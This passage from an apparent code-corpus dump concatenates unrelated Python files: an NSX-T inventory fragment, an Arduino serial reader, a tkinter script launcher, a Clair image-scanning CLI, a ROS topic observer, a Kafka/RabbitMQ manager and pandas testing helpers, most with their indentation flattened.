tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter_object in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_adapter_object.management_cluster:
for mgmt_node in mgmt_cluster.management_nodes:
for mgmt_service in mgmt_node.management_service:
tree[nsxt_mgmt_plane.target][mgmt_service.uuid] = {
'uuid': mgmt_service.uuid,
'name': mgmt_service.name,
'nsxt_adapter_name': nsxt_adapter_object.name,
'nsxt_adapter_uuid': nsxt_adapter_object.uuid,
'mgmt_cluster_name': mgmt_cluster.name,
'mgmt_cluster_uuid': mgmt_cluster.uuid,
'mgmt_node_name': mgmt_node.name,
'mgmt_node_uuid': mgmt_node.uuid,
'target': nsxt_mgmt_plane.target,
'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_mgmt_service'] = tree
return tree
|
ArduinoSerial_PyQt_Demo_ThreadMonitorSerial.py
|
# -*- coding: utf-8 -*-
import queue
import threading
import serial
import random
import time
from ArduinoSerial_PyQt_Demo_Global import *
class ThreadArduino:
"""
"""
def __init__(self, port, delay):
self.SERIALPORT = port
self.running = 1
self.msg = ''
self.delay = delay
self.thread1 = threading.Thread(target=self.worker)
self.thread1.start()
def worker(self):
"""
This is where we handle the asynchronous I/O.
Put your stuff here.
"""
# rand = random.Random()
        ser = serial.Serial(self.SERIALPORT, 9600)  # use the port passed to the constructor
while self.running:
time.sleep(self.delay)
# self.msg = str(random.random()) + '\n'
# This is where we poll the Serial port.
            self.msg = ser.readline().decode()
            if self.msg:
                queue.put(self.msg)
if self.running == 0:
ser.close()
|
test20181224.py
|
from runpy import run_path
from tkinter import *
import multiprocessing
import os
# from multiprocessing import Process
def make_app():
app = Tk()
app.geometry('300x300')
Label(app, text='auto run script', font=('Arial', 25, 'bold')).pack()
Listbox(app, name='listb', bg='#f2f2f2').pack(fill=BOTH, expand=True)
Button(text='run', command=run_script).pack()
return app
def ui_make_list():
listb = app.children['listb']
for d in os.listdir():
listb.insert(END, d)
def run_script():
listb = app.children['listb']
s_path = listb.get(ACTIVE)
p = multiprocessing.Process(name='print', target=run_path, args=(s_path,))
p.start()
def stop_script():
for p in multiprocessing.active_children():
if p.name == 'print':
p.terminate()
def watcher():
print(multiprocessing.active_children())
listb = app.children['listb']
s_path = listb.get(ACTIVE)
print(s_path)
app.after(1000, watcher)
if __name__ == '__main__':
app = make_app()
app.after(100, ui_make_list)
app.after(0, watcher)
app.mainloop()
|
cli.py
|
import click
import json
from os import path
import shutil
import socket
from multiprocessing import Process
from . import VERSION
from .clair import check_clair, post_layer, get_report, format_report_text, ClairException
from .util import sha256, wait_net_service, err_and_exit, pretty_json
from .image import check_image, image_to_tgz, http_server, ImageException
@click.command()
@click.option('--clair-uri', default="http://localhost:6060",
help='Base URI for your Clair server')
@click.option('--text-output', is_flag=True, help='Report in Text (Default)')
@click.option('--json-output', is_flag=True, help='Report in JSON')
@click.option('--bind-ip', default="",
help='IP address that the HTTP server providing image to Clair should listen on')
@click.option('--bind-port', default=8088,
help='Port that the HTTP server providing image to Clair should listen on')
@click.option('--verbose', is_flag=True, help='Show progress messages to STDERR')
@click.version_option(version=VERSION)
@click.argument('image', required=True)
def cli(image, clair_uri, text_output, json_output, bind_ip, bind_port, verbose):
# Try to get host IP that will be accessible to clair in docker
if bind_ip == "":
local_ip = socket.gethostbyname(socket.gethostname())
if local_ip == "127.0.0.1":
err_and_exit("Local IP resolved to 127.0.0.1. Please use --bind-ip to specify your true IP address, so that the clair scanner can access the SIF image.", 1)
bind_ip = local_ip
API_URI = clair_uri + '/v1/'
# Check image exists, and export it to a gzipped tar in a temporary directory
try:
check_image(image)
(tar_dir, tar_file) = image_to_tgz(image, verbose)
except ImageException as e:
err_and_exit(e, 1)
# Image name for Clair will be the SHA256 of the .tar.gz
image_name = sha256(tar_file)
if verbose:
click.echo("Image has SHA256: %s" % image_name, err=True)
# Make sure we can talk to Clair OK
try:
check_clair(API_URI, verbose)
except ClairException as e:
err_and_exit(e)
# Start an HTTP server to serve the .tar.gz from our temporary directory
# so that Clair can retrieve it
httpd = Process(target=http_server, args=(tar_dir, bind_ip, bind_port, verbose))
httpd.daemon = True
httpd.start()
# Allow up to 30 seconds for the httpd to start and be answering requests
httpd_ready = wait_net_service(bind_ip, bind_port, 30)
if not httpd_ready:
httpd.terminate()
shutil.rmtree(tar_dir)
err_and_exit("Error: HTTP server did not become ready\n", 1)
image_uri = 'http://%s:%d/%s' % (bind_ip, bind_port, path.basename(tar_file))
    # Register the image with Clair as a docker layer that has no parent
try:
post_layer(API_URI, image_name, image_uri, verbose)
except ClairException as e:
httpd.terminate()
shutil.rmtree(tar_dir)
err_and_exit(e, 1)
# Done with the .tar.gz so stop serving it and remove the temp dir
httpd.terminate()
shutil.rmtree(tar_dir)
# Retrieve the vulnerability report from Clair
report = get_report(API_URI, image_name)
# Spit out the report on STDOUT
if json_output:
pretty_report = pretty_json(report)
click.echo(pretty_report)
else:
format_report_text(report)
|
topic_observer.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (C) 2020, Raffaello Bonghi <raffaello@rnext.it>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import rospy
import importlib
import rosservice
import genpy
from threading import Thread
class Observer(Thread):
def __init__(self, topic_name, topic_type, timeout, service, request):
super(Observer, self).__init__()
self.timer = None
self.timeout = timeout
self.service = service
self.request = request
# Disable check timeout
self.last_message = -1
# Extract topic class
package, message = topic_type.split('/')
mod = importlib.import_module(package + '.msg')
topic_type = getattr(mod, message)
# Launch Joystick reader
rospy.Subscriber(topic_name, topic_type, self.topic_callback)
# Service classes
self.service_proxy = None
self.service_class = None
# Start Service client
self._thread = Thread(target=self._init_service, args=[])
self._thread.start()
# Start thread
self.start()
def _init_service(self):
try:
rospy.wait_for_service(self.service)
# Extract service class by name
self.service_class = rosservice.get_service_class_by_name(self.service)
self.service_proxy = rospy.ServiceProxy(self.service, self.service_class)
rospy.loginfo("Initialized {service}".format(service=self.service))
        except rospy.ServiceException as error:
            rospy.logerr("Service call failed: {error}".format(error=error))
        except rosservice.ROSServiceException as error:
            rospy.logerr("Service call failed: {error}".format(error=error))
        except rospy.ROSException:
            rospy.loginfo("Service error")
def fire_service(self):
# Call service
if self.service_proxy is None and self.service_class is None:
rospy.logerr("Service {service} not initializated".format(service=self.service))
return
# Make service message
service_class = self.service_class._request_class()
try:
genpy.message.fill_message_args(service_class, [self.request])
        except genpy.MessageException as error:
rospy.logerr("Message in {service}: {error}".format(service=self.service, error=error))
return
# Run service proxy
try:
res = self.service_proxy(service_class)
rospy.loginfo("Output {service} {res}".format(service=self.service, res=res.return_))
        except rospy.ServiceException as error:
rospy.logerr("Service call failed: {error}".format(error=error))
# Restart initialization thread
self._thread.join()
if not self._thread.is_alive():
self._thread = Thread(target=self._init_service, args=[])
self._thread.start()
def run(self):
# Running only with ROS active
while not rospy.is_shutdown():
if self.last_message > 0:
# Timeout in minutes
if rospy.get_time() - self.last_message >= self.timeout * 60:
# Clean message
self.last_message = -1
# Fire service
self.fire_service()
# Close thread
rospy.logdebug("Close!")
def topic_callback(self, data):
# Initialize timer
self.last_message = rospy.get_time()
def topic_observer():
rospy.init_node('topic_observer', anonymous=True)
# Load topic to observer
topic_name = rospy.get_param("~name", "chatter")
topic_type = rospy.get_param("~type", "std_msgs/String")
timeout = rospy.get_param("~timeout", 1)
# Load service and request
service = rospy.get_param("~service", "")
request = rospy.get_param("~request", {})
rospy.loginfo("Timeout={timeout}min Name={name} Type={type}".format(timeout=timeout, name=topic_name, type=topic_type))
# Start observer
Observer(topic_name, topic_type, timeout, service, request)
# Spin message
rospy.spin()
if __name__ == '__main__':
topic_observer()
# EOF
|
manager.py
|
import logging
logger = logging.getLogger(__name__)
logger.debug("Loaded " + __name__)
import os
import sys
import signal
from .kafka_connector import KafkaConnector
from .rabbitMqConnector import RabbitMqConnector
import threading
from .vedaio import VedaSocketIO
class Manager(object):
Type = "Manager"
def __init__(self, **kwargs):
super(Manager, self).__init__()
self.behaviour = kwargs.get('behaviour')
self.connector_type = kwargs.get('connector_type','kafka')
self.kafka_client_type = kwargs.get('kafka_client_type',None)
self.kafka_client_config = kwargs.get('kafka_client_config',None)
self.rabbit_client_config=kwargs.get('rabbit_client_config',None)
self.pid = os.getpid()
self.exit_code = 0
if self.connector_type == 'kafka':
self.connected_behaviour = KafkaConnector(
self.behaviour,
kafka_client_type=self.kafka_client_type,
on_exit=self.stop,
**self.kafka_client_config)
if self.connector_type == 'rabbitMq':
self.rabbit_client_config = kwargs.get('rabbit_client_config')
self.connected_behaviour = RabbitMqConnector(
self.behaviour,
on_exit=self.stop,
**self.rabbit_client_config)
self.signal_map = kwargs.get('signal_map', {})
        # Enable Kafka on SIGUSR1 (10) and disable it on SIGUSR2 (12)
signal.signal(10, self.receiveSignal)
signal.signal(12, self.receiveSignal)
signal.signal(signal.SIGTERM, self.receiveSignal)
# Socket IO based Live updates
if not self.connected_behaviour.behavior.offlineMode and self.connector_type!='rabbitMq':
self.socketClient=VedaSocketIO(subscriptions=self.subscriptionTopics())
self.registerUpdateHandler()
###### Update Related Functions
def subscriptionTopics(self,subscriptions=[]):
subscriptions = self.connected_behaviour.subscriptionTopics(subscriptions)
logger.info("Manager: Subscription Topics: {}".format(subscriptions))
return subscriptions
# update event callback
def update(self, data):
logger.info("Manager: Update triggered with data:{}".format(data))
UpdateSuccess = self.connected_behaviour.update(data)
logger.info("Manager: Hot update status:{}".format(UpdateSuccess))
# Handle update if not handled already
if not UpdateSuccess:
self.stop(exit_code=100)
# register update event callback
def registerUpdateHandler(self):
@self.socketClient.sio.on("message")
def my_message(data):
self.update(data)
###### Run Method
def run(self):
logger.info("Manager run() called.")
from flask import current_app as app
self.connected_behaviour_thread = threading.Thread(target=self.connected_behaviour.run, args=(app._get_current_object(),))
self.connected_behaviour_thread.start()
def onStart(self):
logger.info("Manager onStart() called.")
def onExit(self):
logger.info("Manager onExit() called.")
# Handling Signals
def receiveSignal(self, signal_number, frame):
print('Received:', signal_number)
if(signal_number in self.signal_map):
f = self.signal_map[signal_number]
f['func'](*f['args'], **f['kwargs'])
# Set Kafka Enable/Disable on SIGUSR2 (12)
if(signal_number == 10):
logger.info("Enaling Kafka")
self.connected_behaviour.enable_kafka()
if(signal_number == 12):
logger.info("Disabling Kafka")
self.connected_behaviour.disable_kafka()
if (signal_number == signal.SIGTERM):
logger.info("Stopping Everything")
self.cleanup()
def onSignal(self):
logger.info("Manager Signal Handler Initialized.")
logger.info('My PID is:{}'.format(str(os.getpid())))
# Register signals
for k,v in self.signal_map.items():
print("Registering Signal = {}".format(k))
signal.signal(k, self.receiveSignal)
def stop(self, exit_code=0):
logger.info("Stopping function triggered with exit_code:{}".format(exit_code))
self.exit_code=exit_code
os.kill(self.pid, signal.SIGTERM)
def cleanup(self):
if not self.connected_behaviour.behavior.offlineMode:
self.socketClient.sio.disconnect()
self.connected_behaviour.stop()
self.connected_behaviour_thread.join(timeout=10)
exit(self.exit_code)
|
__init__.py
|
from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import (
DatetimeArray,
PandasArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
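# Illustrative usage sketch (not part of the original module): box_expected
# wraps a plain sequence in the requested container so a test can compare
# like with like.  The helper name below is hypothetical.
def _demo_box_expected_usage():
    raw = [1, 2, 3]
    as_index = box_expected(raw, Index)      # Index([1, 2, 3])
    as_series = box_expected(raw, Series)    # Series([1, 2, 3])
    # With DataFrame the result is transposed and repeated to two rows,
    # giving a 2 x 3 frame (see the transpose branch above).
    as_frame = box_expected(raw, DataFrame)
    return as_index, as_series, as_frame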
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
    Returns
    -------
    DataFrame
        A DataFrame with a DatetimeIndex and the following columns:
        * name : object dtype with string names
        * id : int dtype with Poisson-distributed integer ids
        * x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. If True, will use default
        names; if False, will use no names; if a list is given, the name of
        each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
        label will be repeated at the corresponding level, you can specify just
        the first few, the rest will use the default ndupe_l of 1.
        len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" creates a datetime index.
        "td" creates a timedelta index.
        if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
        # typing.Counter is deprecated since Python 3.9 in favour of
        # subscripting collections.Counter directly (PEP 585, generic alias types).
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
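# Illustrative usage sketch (not part of the original module): a few ways
# makeCustomIndex can be called; the helper name below is hypothetical.
def _demo_make_custom_index_usage():
    flat = makeCustomIndex(nentries=5, nlevels=1)                  # string Index
    dated = makeCustomIndex(nentries=5, nlevels=1, idx_type="dt")  # DatetimeIndex
    # Two-level MultiIndex whose first level repeats each label twice.
    multi = makeCustomIndex(nentries=6, nlevels=2, ndupe_l=[2])
    return flat, dated, multi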
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
        default names or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels == 1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
    >> makeCustomDataframe(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
